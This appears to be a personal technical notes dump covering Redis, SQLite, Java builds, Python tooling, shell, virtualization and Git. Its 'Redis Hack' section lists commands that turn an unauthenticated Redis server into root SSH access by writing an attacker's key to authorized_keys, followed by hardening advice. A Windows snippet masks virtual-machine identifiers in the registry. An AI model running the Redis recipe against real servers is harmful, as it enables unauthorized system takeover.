cat sentinel.conf | sed s/26379/46379/g > sentinel_2.conf
redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel
3.5.3 - Redis Hack
Remote login
How to replay
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
$ cat foo | redis-cli -h $remote_ip -x set crack
$ redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save /root/.ssh/authorized_keys
save
How to avoid
# redis.conf
# prevent changing dbfilename etc. over a remote connection
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
requirepass mypassword
bind 127.0.0.1
groupadd -r redis && useradd -r -g redis redis
3.5.4 - Redis Persistence
persistence
RDB
fork a child process periodically and dump the dataset to a single file
AOF, append-only file
log every write and delete command
# after 300s, dump if at least 10 key changed
save 300 10
# appendfsync: always / everysec / no
# fsync every second
appendfsync everysec
# rewrite when the AOF has grown by 100%
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
3.5.5 - Redis Sentinel
sentinel
ping
info replication
info server
info sentinel
sentinel auth-pass <name> <password>
sentinel masters
sentinel master <name>
sentinel slaves <name>
# return the ip and port of the named master;
# if a failover is in progress or finished, shows the promoted slave's ip and port
sentinel get-master-addr-by-name <name>
# reset the state of all masters whose name matches the pattern
sentinel reset <pattern>
# force a failover, without requiring agreement from the other sentinels
sentinel failover <master name>
# start monitoring a new master
sentinel monitor <name> <ip> <port> <quorum>
# stop monitoring a master
sentinel remove <name>
# change a master's configuration; multiple <option> <value> pairs are supported
sentinel set <name> <option> <value>
conf
# 26379
redis-sentinel /path/to/sentinel.conf
redis-server /path/to/sentinel.conf --sentinel
sentinel.conf
sentinel monitor mymaster 127.0.0.1 6379 2
sentinel down-after-milliseconds mymaster 60000
sentinel failover-timeout mymaster 180000
sentinel parallel-syncs mymaster 1
sentinel monitor resque 192.168.1.3 6380 4
sentinel down-after-milliseconds resque 10000
sentinel failover-timeout resque 180000
sentinel parallel-syncs resque 5
sentinel monitor mymaster 127.0.0.1 6379 2
The trailing 2: only when 2 sentinels in the cluster consider the master dead is it truly treated as unavailable
sentinel <option_name> <master_name> <option_value>
Every option can be changed at runtime with the SENTINEL SET command.
down-after-milliseconds
A sentinel sends PING heartbeats to the master to check that it is alive; if the master does not reply PONG within this window, or replies with an error, the sentinel subjectively (unilaterally) considers the master unavailable.
parallel-syncs
During a failover, this option caps how many slaves may resynchronize with the new master at the same time. The smaller the number, the longer the failover takes; the larger it is, the more slaves become unavailable due to replication. Setting it to 1 guarantees that only one slave at a time is unable to serve requests.
Sentinel has two different notions of unavailability: subjectively down (SDOWN) and objectively down (ODOWN). SDOWN is a single sentinel's own view of the master's state; ODOWN requires a certain number of sentinels to agree before the master is considered objectively down. Sentinels exchange their findings with the SENTINEL is_master_down_by_addr command.
min-slaves-to-write 1
min-slaves-max-lag 10
When a redis instance is a master, if it cannot write to at least min-slaves-to-write slaves it refuses client writes. Because replication is asynchronous, "cannot write to a slave" means the slave is disconnected, or has not requested replication data from the master within min-slaves-max-lag seconds.
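To consume such a deployment from an application, redis-py ships a Sentinel client that asks the sentinels for the current master address (the ports and the master name mymaster follow the configs above):

from redis.sentinel import Sentinel

sentinel = Sentinel([("127.0.0.1", 26379), ("127.0.0.1", 36379), ("127.0.0.1", 46379)],
                    socket_timeout=0.5)
print(sentinel.discover_master("mymaster"))   # (ip, port) of the current master

master = sentinel.master_for("mymaster", socket_timeout=0.5)   # re-discovers after failover
replica = sentinel.slave_for("mymaster", socket_timeout=0.5)
master.set("k", "v")
print(replica.get("k"))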
Subscribing to sentinel messages
psubscribe *
psubscribe sdown
Every received message has the format:
<instance-type> <name> <ip> <port> @ <master-name> <master-ip> <master-port>
+reset-master <instance details> -- the master was reset.
+slave <instance details> -- a new slave was detected and added to the slave list.
+failover-state-reconf-slaves <instance details> -- failover state changed to reconf-slaves.
+failover-detected <instance details> -- a failover was detected.
+slave-reconf-sent <instance details> -- a SLAVEOF command was sent to reconfigure the slave.
+slave-reconf-inprog <instance details> -- the slave is being reconfigured as a slave of the new master, but replication has not started yet.
+slave-reconf-done <instance details> -- the slave has been reconfigured and its replication is in sync with the new master.
-dup-sentinel <instance details> -- duplicate sentinels for the given master were removed (this can happen when a sentinel restarts).
+sentinel <instance details> -- a new sentinel for this master was detected.
+sdown <instance details> -- the instance entered SDOWN state.
-sdown <instance details> -- the instance left SDOWN state.
+odown <instance details> -- the instance entered ODOWN state.
-odown <instance details> -- the instance left ODOWN state.
+new-epoch <instance details> -- the current epoch (configuration version) was updated.
+try-failover <instance details> -- failover conditions were met; waiting to be elected by the other sentinels.
+elected-leader <instance details> -- elected as the leader that will perform the failover.
+failover-state-select-slave <instance details> -- started looking for a slave to promote to master.
no-good-slave <instance details> -- no suitable slave was found to become the new master.
selected-slave <instance details> -- a suitable slave was found to become the new master.
failover-state-send-slaveof-noone <instance details> -- switching the selected slave's role to master.
failover-end-for-timeout <instance details> -- the failover failed due to timeout.
failover-end <instance details> -- the failover completed successfully.
switch-master <master name> <oldip> <oldport> <newip> <newport> -- the master address changed; usually the message clients care about most.
+tilt -- entered Tilt mode.
-tilt -- left Tilt mode.
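These events arrive over the sentinel's own pub/sub interface, so psubscribe * works from any client connected to the sentinel port; a small redis-py sketch (sentinel port as configured above):

import redis

sent = redis.Redis(port=26379)           # connect to the sentinel, not the master
p = sent.pubsub()
p.psubscribe("*")                        # same as PSUBSCRIBE * in the CLI

for msg in p.listen():
    if msg["type"] == "pmessage":
        # e.g. channel b'+sdown', data b'master mymaster 127.0.0.1 7000 ...'
        print(msg["channel"], msg["data"])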
3.5.6 - Redis Type
redisObject
The core of Redis's type system: every key and value in the database, as well as the arguments Redis itself processes, is represented as this type.
// server.h
/* The actual Redis Object */
#define OBJ_STRING 0 /* String object. */
#define OBJ_LIST 1 /* List object. */
#define OBJ_SET 2 /* Set object. */
#define OBJ_ZSET 3 /* Sorted set object. */
#define OBJ_HASH 4 /* Hash object. */
/* Objects encoding. Some kind of objects like Strings and Hashes can be
* internally represented in multiple ways. The 'encoding' field of the object
* is set to one of this fields for this object. */
#define OBJ_ENCODING_RAW 0 /* Raw representation */
#define OBJ_ENCODING_INT 1 /* Encoded as integer */
#define OBJ_ENCODING_HT 2 /* Encoded as hash table */
#define OBJ_ENCODING_ZIPMAP 3 /* Encoded as zipmap */
#define OBJ_ENCODING_LINKEDLIST 4 /* No longer used: old list encoding. */
#define OBJ_ENCODING_ZIPLIST 5 /* Encoded as ziplist */
#define OBJ_ENCODING_INTSET 6 /* Encoded as intset */
#define OBJ_ENCODING_SKIPLIST 7 /* Encoded as skiplist */
#define OBJ_ENCODING_EMBSTR 8 /* Embedded sds string encoding */
#define OBJ_ENCODING_QUICKLIST 9 /* Encoded as linked list of ziplists */
#define OBJ_ENCODING_STREAM 10 /* Encoded as a radix tree of listpacks */
typedef struct redisObject {
// data type, e.g. OBJ_STRING
unsigned type:4;
// encoding, e.g. OBJ_ENCODING_RAW
unsigned encoding:4;
// #define LRU_BITS 24
// LRU time
unsigned lru:LRU_BITS; /* LRU time (relative to global lru_clock) or
* LFU data (least significant 8 bits frequency
* and most significant 16 bits access time). */
// reference count
int refcount;
// pointer to the actual value
void *ptr;
} robj;
Type introspection
type keyname
returns the type: REDIS_STRING, REDIS_LIST, REDIS_HASH, REDIS_SET or REDIS_ZSET
object encoding keyname
returns the encoding: int, embstr or raw for REDIS_STRING, ...
object idletime keyname (unit is seconds)
LRU access time
object refcount keyname
shared-object reference count; only for integer-formatted strings
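These introspection commands can also be issued from a client, e.g. via redis-py's object() helper:

import redis

r = redis.Redis()
r.set("n", 123)
print(r.type("n"))                  # b'string'
print(r.object("encoding", "n"))    # b'int'
r.set("s", "x" * 100)
print(r.object("encoding", "s"))    # b'raw'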
String
Simple Dynamic String
struct sdshdr {
int len;
int free;
char buf[];
};
REDIS_STRING
int: an 8-byte long
embstr: read-only string, <= 39 bytes
raw: > 39 bytes
3.6 - Sqlite
cmd
.help
.databases
.tables
Sample
-- jdbc:mysql://localhost:3306?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
-- jdbc:sqlite:test.sqlite
create database test;
create table student (
name varchar(100) not null primary key,
class varchar(100),
gender varchar(100),
age smallint default -1,
height decimal(16,6),
weight decimal(16,6)
);
insert into student values
('john','a','male',27,173,78),
('paul','a','male',27,179,73),
('george','b','male',25,182,69),
('ringer','c','male',24,169,59),
('yoko','a','female',33,165,53),
('rita','b','female',25,163,57),
('lucy','c','female',28,175,60);
-- score table columns: date, subject, student_name, score
create table score (
`date` date not null,
subject varchar(100),
student_name varchar(100),
score decimal(16,6)
);
insert into score values
('2020-08-04','chinese','john',60),
('2020-08-04','chinese','paul',75),
('2020-08-04','chinese','george',55),
('2020-08-04','chinese','ringer',81),
('2020-08-04','chinese','yoko',95),
('2020-08-04','chinese','rita',72),
('2020-08-04','chinese','lucy',88),
('2020-08-04','math','john',96),
('2020-08-04','math','paul',100),
('2020-08-04','math','george',65),
('2020-08-04','math','ringer',87),
('2020-08-04','math','yoko',77),
('2020-08-04','math','rita',85),
('2020-08-04','math','lucy',98),
('2020-08-04','pe','john',82),
('2020-08-04','pe','paul',97),
('2020-08-04','pe','george',71),
('2020-08-04','pe','ringer',100),
('2020-08-04','pe','yoko',85),
('2020-08-04','pe','rita',52),
('2020-08-04','pe','lucy',75),
('2020-08-05','chinese','john',64),
('2020-08-05','chinese','paul',80),
('2020-08-05','chinese','george',42),
('2020-08-05','chinese','ringer',91),
('2020-08-05','chinese','yoko',100),
('2020-08-05','chinese','rita',79),
('2020-08-05','chinese','lucy',82),
('2020-08-05','math','john',91),
('2020-08-05','math','paul',90),
('2020-08-05','math','george',73),
('2020-08-05','math','ringer',76),
('2020-08-05','math','yoko',87),
('2020-08-05','math','rita',81),
('2020-08-05','math','lucy',100),
('2020-08-05','pe','john',88),
('2020-08-05','pe','paul',100),
('2020-08-05','pe','george',67),
('2020-08-05','pe','ringer',91),
('2020-08-05','pe','yoko',92),
('2020-08-05','pe','rita',60),
('2020-08-05','pe','lucy',73);
4 - Lang
4.1 - JVM
4.1.1 - Maven
test
# org.apache.maven.plugins:maven-surefire-plugin:2.22.0
mvn -Dtest=TestApp1,TestApp2 test
mvn -Dtest=TestApp1#testHello* test
# match pattern 'testHello*' and 'testMagic*'
mvn -Dtest=TestApp1#testHello*+testMagic* test
4.1.2 - OpenJDK
compile openjdk
jdk18 on mac
git clone https://github.com/openjdk/jdk18.git --depth=1
# autoconf=2.71, ccache=4.6.3, freetype=2.12.1
brew install autoconf ccache freetype
bash ./configure --help
# --enable-debug : --with-debug-level=fastdebug --with-debug-level=slowdebug
# --with-jvm-variants=server
# --with-num-cores=8
# --with-memory-size=8192
# MacOS
# configure: error: No xcodebuild tool and no system framework headers found
sudo rm -rf /Library/Developer/CommandLineTools
sudo xcode-select --install
# jdk17+ require xcode itself
bash ./configure --with-debug-level=slowdebug --enable-ccache --disable-warnings-as-errors
make images
./build/macosx-x86_64-normal-server-slowdebug/jdk/bin/java -version
jdk8u
# jdk8u
bash ./configure --with-num-cores=8 --with-debug-level=slowdebug
jdk17 on debian10
# 10.3 is ok
sudo apt install g++-10
# Compile jdk17 on debian 11.2 gcc 10.2
git clone https://github.com/openjdk/jdk17 --depth=1
cd jdk17
# tools
sudo apt install gcc g++ make autoconf ccache zip
# Boot JDK
sudo apt install openjdk-17-jdk
# header files
sudo apt install -y libx11-dev libxext-dev libxrender-dev libxrandr-dev libxtst-dev libxt-dev
sudo apt install -y libcups2-dev libfontconfig1-dev libasound2-dev
bash ./configure --with-debug-level=slowdebug --enable-ccache
make images
4.1.3 - Scala
Scala syntax
// import math._ but cos
import math.{cos => _, _}
object HelloWorld {
def main(args: Array[String]): Unit = {
val myVal: String = "Hello World!"
var myVar: Long = System.currentTimeMillis()
myVar += 1
val name = myVal:Object // cast
println(s"$myVal")
}
def patternMatch(x: Any): Any = x match {
case 1 => 1
case "five" => 5
case _ => 0
}
}
trait Animal {
final val age = 18
val color: String
val kind = "Animal"
def eq(x: Any): Boolean
def ne(x: Any): Boolean = !eq(x)
}
class Cat extends Animal {
override val color = "Yellow"
override val kind = "Cat"
def eq(x: Any): Boolean = false
}
class Dog(name: String) extends Animal {
def this() = this("Dog")
override val color = "Brown"
def eq(x: Any): Boolean = true
}
trait Traversable {
def foreach[U](f: Elem => U): Unit
}
trait Iterable extends Traversable
trait Seq extends Iterable
trait Set extends Iterable
trait Map extends Iterable
import collection.JavaConversions._
4.2 - Python
4.2.1 - Async Python
gunicorn
A Python WSGI HTTP server for Unix-like OSes, inspired by Ruby's unicorn. Pre-fork worker model: one master process manages multiple worker processes. The recommended number of workers is (2 * $num_cores) + 1.
pip install gunicorn greenlet eventlet gevent
# -k, --worker-class: worker type
gunicorn -k sync --workers=17 --threads 1 --worker-connections 1000
sync: multi-process mode
handles only one request at a time per worker
eventlet, gevent: coroutine mode
cooperative multi-threading: non-blocking I/O lets a process handle the next request while waiting for I/O
gthread: multi-threaded mode
worker threads, with a thread pool managing the connections
gaiohttp
async I/O implemented with the aiohttp library
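A minimal WSGI app to try the worker classes against (the file name app.py is arbitrary). With -k sync the sleep serializes requests within each worker; with -k gevent the worker keeps serving other requests during the sleep, since gunicorn's gevent worker monkey-patches the standard library:

# app.py -- run with: gunicorn -k gevent -w 4 app:application
import time

def application(environ, start_response):
    time.sleep(0.1)  # simulated blocking I/O
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"hello\n"]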
4.2.2 - Database client in Python
mysql
# pip3 install PyMySQL
import pymysql
db = pymysql.connect(host="localhost", user="user", password="passwd", database="testdb")
cursor = db.cursor()
cursor.execute("SELECT VERSION()")
print(f"Database version : {cursor.fetchone()}")

try:
    cursor.execute("DROP TABLE IF EXISTS EMPLOYEE")
    db.commit()
except Exception:
    db.rollback()

cursor.execute("SELECT 1")
rows = cursor.fetchall()
for row in rows:
    print(row[0])

db.close()
rabbitmq
import pika
connection = pika.BlockingConnection(pika.ConnectionParameters('127.0.0.1', 5672))
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='', routing_key='hello', body='Hello World!')
print("[x] Sent 'Hello World!'")
connection.close()
4.2.3 - Install Python
pyenv
curl https://pyenv.run | bash
pyenv install --list
pyenv versions
pyenv global 3.7.15
install python2.7
sudo apt install make gcc g++ patch cmake -y
sudo apt install libssl-dev libbz2-dev libreadline-dev zlib1g.dev libsqlite3-dev libffi-dev lzma-dev libsnappy-dev libjpeg-dev default-libmysqlclient-dev -y
pyenv install 2.7.18
build from source
wget http://www.python.org/ftp/python/3.7.15/Python-3.7.15.tgz
tar -zxvf Python-3.7.15.tgz
cd Python-3.7.15
./configure --prefix=/opt/python3 --enable-optimizations
make
make install
make clean
make distclean
/opt/python3/bin/python3 -V
python2
debian9
# docker pull debian:9
# docker run -d -it --name debian9 debian:9
# https://mirrors.tuna.tsinghua.edu.cn/help/debian/
apt update
apt install python python-pip -y
pip install -U setuptools
apt install make gcc g++ patch cmake -y
apt install libssl-dev libbz2-dev libreadline-dev zlib1g.dev libsqlite3-dev libffi-dev lzma-dev libsnappy-dev libjpeg-dev default-libmysqlclient-dev -y
# mysql-python
# for old debian: libmysqlclient-dev
apt install default-libmysqlclient-dev -y
pip install mysql-python
# pyarrow
apt install -y -V ca-certificates lsb-release wget
wget https://apache.jfrog.io/artifactory/arrow/$(lsb_release --id --short | tr 'A-Z' 'a-z')/apache-arrow-apt-source-latest-$(lsb_release --codename --short).deb -O /tmp/apache-arrow.deb
apt -y install /tmp/apache-arrow.deb
apt -y update
apt -y install libarrow-dev libarrow-python-dev
rm /tmp/apache-arrow.deb
fedora
# docker pull fedora
# docker run -d -it --name fedora fedora
# https://mirrors.tuna.tsinghua.edu.cn/help/fedora/
# python2 is not included
# dnf whatprovides pip
# sudo alternatives --set python /usr/bin/python2
dnf update && dnf install git curl -y
curl https://pyenv.run | bash
cat <<EOF >> ~/.bashrc
export PYENV_ROOT="\$HOME/.pyenv"
command -v pyenv >/dev/null || export PATH="\$PYENV_ROOT/bin:\$PATH"
eval "\$(pyenv init -)"
EOF
source ~/.bashrc
dnf install make gcc g++ -y
dnf install readline-devel zlib-devel openssl-devel bzip2-devel sqlite-devel libffi-devel lzma-sdk-devel -y
pyenv install 2.7.18
pyenv global 2.7.18
# pyarrow
dnf install cmake libarrow-devel libarrow-python-devel -y
pip install arrow pyarrow
# mysql-python
dnf install mysql-devel -y
pip install mysql-python
4.2.4 - IPython
ipython
ipython --pylab
4.2.5 - Python Pip
Install pip
wget https://bootstrap.pypa.io/get-pip.py -O - | python
Install packages for Mac ARM
numpy
brew install openblas
OPENBLAS="$(brew --prefix openblas)" pip install numpy
4.2.6 - Python Std
base
datetime & time
import datetime
import time
dt = datetime.datetime.now()
unix_sec = time.mktime(dt.timetuple())
dt = datetime.datetime.fromtimestamp(time.time())
s = dt.strftime("%Y-%m-%d %H:%M:%S")
dt = datetime.datetime.strptime(s, "%Y-%m-%d %H:%M:%S")
unix_sec = time.mktime(time.strptime(s, "%Y-%m-%d %H:%M:%S"))
s = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(unix_sec))
random
import random
n_float = random.uniform(0, 10) # [0, 10], both ends inclusive
n_float = random.random() # [0, 1.0)
# random.randrange([start], stop[, step])
n_int = random.randint(1, 3) # [1, 3]
s_str = random.choice(['r', 'g', 'b'])
s_list = random.sample(['r', 'g', 'b'], 2)
file
ConfigParser
import ConfigParser
conf = ConfigParser.ConfigParser()
conf.read("myapp.ini")
sections = conf.sections()
section = sections[0]
keys = conf.options("sec")
kvs = conf.items("sec")
val = conf.get("sec", "key")
int_val = conf.getint("sec", "key")
4.2.7 - Python Test
unittest
import unittest

class TestStringMethods(unittest.TestCase):
    def test_somecase(self):
        self.assertEqual('foo'.upper(), 'FOO')
        self.assertTrue('FOO'.isupper())
        self.assertFalse('Foo'.isupper())

if __name__ == '__main__':
    unittest.main()
python -m unittest test_module1 test_module2
python -m unittest test_module.TestClass
python -m unittest test_module.TestClass.test_method
python -m unittest -v tests/test_something.py
4.2.8 - Python Web
std
python3 -m http.server 3333
python -m SimpleHTTPServer 3333
fastapi
Python 3.7+
http://127.0.0.1:8000/docs for https://github.com/swagger-api/swagger-ui
http://127.0.0.1:8000/redoc for https://github.com/Rebilly/ReDoc
pip install "fastapi[all]"
# use the 'app' object in module main (a file called main.py); note that a
# hyphenated file name like fastapi-main.py cannot be imported as a Python module
uvicorn main:app --reload
from fastapi import FastAPI

app = FastAPI()

@app.get("/")
async def root(secs: float):
    from time import sleep
    sleep(secs)
    return {"message": "Hello World"}
flask
pip install Flask
python -m flask run
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def hello_world():
    secs = request.args.get("secs")
    from time import sleep
    sleep(float(secs))
    return {"message": "Hello World"}

if __name__ == '__main__':
    app.run(debug=True)
django
pip install Django
django-admin startproject mysite
cd mysite
python manage.py runserver 0.0.0.0:8000
bottle
from bottle import request, route, run, template
from time import sleep

@route('/hello/<name>')
def hello(name):
    return template('<b>Hello {{name}}</b>!', name=name)

@route('/')
def index():
    secs = request.query.get('secs')
    name = request.query.get('name')
    if secs:
        sleep(float(secs))
    if not name:
        name = "World"
    return "Hello {}!".format(name)

run(host='0.0.0.0', port=8000)
trollius
import trollius as asyncio
from trollius import From

@asyncio.coroutine
def factorial(name, number):
    f = 1
    for i in range(2, number + 1):
        print("Task %s: Compute factorial(%d)..." % (name, i))
        yield From(asyncio.sleep(1))
        f *= i
    print("Task %s completed! factorial(%d) is %d" % (name, number, f))

loop = asyncio.get_event_loop()
tasks = [
    asyncio.async(factorial("A", 8)),
    asyncio.async(factorial("B", 3)),
    asyncio.async(factorial("C", 4))]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
4.3 - Shell
4.3.1 - Frequently used cmds
stat
tree -if | grep -v node_modules | egrep '[.](j|t)sx?$' | xargs wc -l
4.3.2 - Gnu Tools
datetime
date
# output shape: 9999-99-99 99:99:99
# %H 00-23, %M 00-59, %S 00-59
# %t tab char
# %I 00-12
# %j 000-366
# %D MM/dd/yy
# %T hh:mm:ss
date "+%Y-%m-%d %H:%M:%S"
# timestamp, in sec
date +%s
cal
# print cal
cal
cal 9 1752
5 - Ops
5.1 - Os
5.1.1 - CoreOS
rpm-ostree
# omz chsh
sudo rpm-ostree install git wget zsh vim util-linux-user
# compile
sudo rpm-ostree install make gcc g++ patch
# pkg
sudo rpm-ostree install dnf
sudo systemctl reboot
python
curl https://pyenv.run | bash
# add to ~/.zshrc
cat <<EOF >> ~/.zshrc
export PYENV_ROOT="\$HOME/.pyenv"
command -v pyenv >/dev/null || export PATH="\$PYENV_ROOT/bin:\$PATH"
eval "\$(pyenv init -)"
EOF
# dep lib to compile
sudo rpm-ostree install readline-devel zlib-devel openssl-devel bzip2-devel sqlite-devel libffi-devel lzma-sdk-devel
pyenv versions
pyenv install 2.7.18
pyenv install 3.9.13
pyenv global 2.7.18
# pyarrow
sudo rpm-ostree install libarrow-devel libarrow-python-devel
5.1.2 - libvirt
install
- mac
brew install qemu gcc libvirt
brew install virt-manager
# macOS doesn't support QEMU security features
echo 'security_driver = "none"' >> /opt/homebrew/etc/libvirt/qemu.conf
echo "dynamic_ownership = 0" >> /opt/homebrew/etc/libvirt/qemu.conf
echo "remember_owner = 0" >> /opt/homebrew/etc/libvirt/qemu.conf
brew services start libvirt
vagrant
# https://developer.fedoraproject.org/tools/vagrant/vagrant-libvirt.html
# https://vagrant-libvirt.github.io/vagrant-libvirt/installation.html
# vagrant plugin install vagrant-libvirt
Vagrant.configure("2") do |config|
config.vm.provider :libvirt do |libvirt|
libvirt.driver = "qemu"
end
end
# export VAGRANT_DEFAULT_PROVIDER=libvirt
# vagrant up --provider=libvirt
create
from iso
mkdir ~/vms && cd ~/vms
qemu-img create -f qcow2 debian.qcow2 50g
virsh define debian.xml
virsh start debian
virsh list
from qcow2/raw
# https://cdimage.debian.org/images/cloud/stretch/daily/
# yum install qemu-kvm qemu-kvm-tools virt-manager libvirt virt-install -y
virt-install --name debian --ram 2048 --vcpus=2 --disk path=debian.qcow2 --network=bridge:en0 --force --import --autostart
virsh console --domain debian --force
# KVM format convert
qemu-img convert -p -t directsync -O qcow2 test.raw test.qcow2
qemu-img convert -p -t directsync -O raw test.qcows test.raw
5.1.3 - Oh My Zsh
zsh
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
cp ~/.oh-my-zsh/themes/agnoster.zsh-theme ~/.oh-my-zsh/custom/themes/
mv ~/.oh-my-zsh/custom/themes/agnoster.zsh-theme ~/.oh-my-zsh/custom/themes/myagnoster.zsh-theme
# vim ~/.oh-my-zsh/custom/themes/myagnoster.zsh-theme
# replace blue to cyan
# vim ~/.zshrc
# ZSH_THEME="myagnoster"
# add zsh-autosuggestions zsh-syntax-highlighting
cd ~/.oh-my-zsh/custom/plugins
git clone https://github.com/zsh-users/zsh-autosuggestions --depth 1
git clone https://github.com/zsh-users/zsh-syntax-highlighting --depth 1
# . ~/.zshrc
vim
Vim-Plug
# PlugInstall [pluginName]
# PlugUpdate [pluginName]
# PlugDiff : show changelog
# PlugUpgrade : upgrade itself
# PlugStatus
# PlugClean
# PlugSnapshot [filePath] : save a snapshot
curl -fLo ~/.vim/autoload/plug.vim --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
" ~/.vim/bundle for Vundle(https://github.com/VundleVim/Vundle.vim
) compatibility
" Plug 'userName/repoName' or Plug 'pluginName' for https://github.com/vim-scripts
" Vim-Plug download Plugin like this: git -C ~/.vim/bundle clone --recursive https://github.com/vim-scripts/L9.git
call plug#begin('~/.vim/bundle')
" Plug 'file:///path/to/plugin'
" Plug "git:https://exmaple.com/user/repo.git"
" dir tree
Plug 'preservim/nerdtree'
" start screen
Plug 'mhinz/vim-startify'
" highlighting and navigating through different words in a buffer
Plug 'lfv89/vim-interestingwords'
" Check syntax
Plug 'dense-analysis/ale'
" lean & mean status/tabline for vim that's light as air
Plug 'vim-airline/vim-airline'
call plug#end()
5.1.5 - Windows
Virtual machines
Remove the virtual-machine identifiers
:: rename PRLS__ to NOBOX_
REG COPY HKLM\HARDWARE\ACPI\DSDT\PRLS__ HKLM\HARDWARE\ACPI\DSDT\NOBOX_ /s
REG DELETE HKLM\HARDWARE\ACPI\DSDT\PRLS__ /f
:: modify SystemBiosVersion
REG ADD HKLM\HARDWARE\DESCRIPTION\System /v SystemBiosVersion /t REG_MULTI_SZ /d "NOBOX - 1\018.0.2 (53077)\0Some EFI x64 18.0.2-53077 - 12CF55\0" /f
REG ADD HKLM\HARDWARE\DESCRIPTION\System /v VideoBiosVersion /t REG_MULTI_SZ /d "" /f
pause
5.2 - VCS
5.2.1 - Git
git
# mkdir blog && cd blog
# git init
# git remote add origin git@github.com:tukeof/tukeof.github.io.git
git clone git://github.com/tukeof/tukeof.github.io.git blog
cd blog
git add *.md
git commit -m 'initial project version'
git push -u origin master
remote
# add a new remote Git repository
git remote add <shortname> <url>
git remote add origin git@github.com:tukeof/tukeof.github.io.git
git remote add origin ssh://username@127.0.0.1/reponame
git remote -v
git remote update
# this also renames all the remote-tracking branch names
git remote rename branch1 branch2
git remote rm branch1
git remote show origin
# create a local tmp branch and fetch the remote origin master branch into it
git fetch origin master:tmp
# diff the local code against what was just fetched
git diff tmp
# merge the tmp branch into the local master branch
git merge tmp
# delete the tmp branch
git branch -d tmp
# fetch updates of a remote branch and merge them into the given local branch
git pull origin master:<branch_name>
add, rm, commit, log
# -a, --all: automatically stage modified and deleted files
git commit -a -m 'message'
# remove a file from the working tree and the index
git rm <file>
# remove a directory from the index only
git rm -r --cached <dir>
git mv README.md README
# mv README.md README
# git rm README.md
# git add README
# --amend
# reuse the current index for the commit; if nothing changed since the last commit,
# the snapshot is identical and only the commit message changes
git commit --amend
# unstage changes
git reset HEAD <file>
# discard changes in the working directory
git checkout -- <file>
svn
# clone
svn co https://localhost/user/repo
svn co https://localhost/username/repo -r some_version
svn checkout https://localhost/username/repo/dir1/dir2/proj1
arc
# Phabricator
git clone https://github.com/phacility/libphutil.git
git clone https://github.com/phacility/arcanist.git
# add some_install_path/arcanist/bin to the $PATH variable
# credential setup
arc install-certificate
arc set-config editor "vim"
# create a branch (git branch), or show the current branch and its associated revision
arc feature
# create or update a revision; the range is origin/master to the latest commit, including the staging area
arc diff
# all revisions and their status
arc list
# land every commit on the current branch: pull --rebase first, then push
arc land
# show the diff range and related info
arc which
Phabricator
// apply a patch to the current branch
arc patch --diff <patch_version_number> --nocommit --nobranch
5.2.2 - Git Checkout
branch
# list all branches, local and remote
git branch -a
# delete branch
git branch -d <local_branch>
git push origin --delete <remote_branch>
# list tags
git tag
git log --pretty=oneline --abbrev-commit
git show <tag_name>
# tag a commit; the default commit is `HEAD`
git tag <tag_name> <commit_id>
git tag -a <tag_name> -m "message for tag" <commit_id>
# dangerous operation; best to make no modifications until checking out back to `HEAD`
git checkout <tag_name>
#
git checkout -b <branch_name> <tag_name>
git tag -l "<prefix>*"
git push origin <tag_name>
# push all tags
git push origin --tags
# delete a local tag
git tag -d <tag_name>
# delete a remote tag
git push origin :refs/tags/<tag_name>
stash
# list the stash entries that you currently have. stash@{0} is the latest entry
git stash list
# save all uncommitted changes
git stash
# apply all uncommitted changes
git stash apply
merge-base
git merge-base origin/master HEAD
rebase
# Assume the following history exists and the current branch is "topic":
# A - B - C topic
# /
# D - E - F -G master
git switch topic
git rebase master
git rebase master topic
# would be
# A'--B'--C' topic
# /
# D---E---F---G master
graph LR
E --> A --> B --> C(C topic)
D --> E --> F --> G(G master)
mkdir git-repo && cd git-repo
git init --bare
export remote_url=$(pwd)
cd ..
git clone $remote_url git
cd git
# D
echo $(uuidgen) > D && git add . && git commit -m 'D' && git push -u origin master
# D - E
echo $(uuidgen) > E && git add . && git commit -m 'E' && git push -u origin master
git checkout -b topic
git switch master
# D - E - F
echo $(uuidgen) > F && git add . && git commit -m 'F' && git push -u origin master
# D - E - F - G
echo $(uuidgen) > G && git add . && git commit -m 'G' && git push -u origin master
git switch topic
# A
# /
# D - E - F
echo $(uuidgen) > A && git add . && git commit -m 'A' && git push -u origin topic
# A - B
# /
# D - E - F
echo $(uuidgen) > B && git add . && git commit -m 'B' && git push -u origin topic
# A - B - C topic
# /
# D - E - F master
echo $(uuidgen) > C && git add . && git commit -m 'C' && git push -u origin topic
revert
# create a new commit that undoes the given commit
git revert <previous-commit>
reset
# discard changes and reset files to master
git reset --hard origin/master
git reset --hard HEAD
# or keep the changes staged
git reset --soft origin/master
# discard changes and reset to current branch
git checkout . && git clean -xdf
5.2.3 - Git Config
config
git help config
man git-config
git config --list
# convert to LF on commit, to CRLF on checkout
git config --global core.autocrlf true
# convert to LF on commit, no conversion on checkout
git config --global core.autocrlf input
# no conversion on commit or checkout
git config --global core.autocrlf false
# refuse to commit files containing mixed line endings
git config --global core.safecrlf true
# allow committing files containing mixed line endings
git config --global core.safecrlf false
# warn when committing files containing mixed line endings
git config --global core.safecrlf warn
git config --global alias.co checkout
git config --global alias.br branch
git config --global alias.ci commit
git config --global alias.s status
git config --global alias.unstage 'reset HEAD --'
git config --global alias.last 'log -1 HEAD'
# git config --global alias.l '!ls -lah'
git config --global alias.url 'remote get-url --all origin'
# git config --global core.editor "'C:/Options/Notepad++/notepad++.exe' -multiInst -nosession"
git config --global core.editor vim
.gitconfig
[user]
name = yourname
email = youremail
[http]
#proxy = socks5://127.0.0.1:1080
[https]
#proxy = socks5://127.0.0.1:1080
[core]
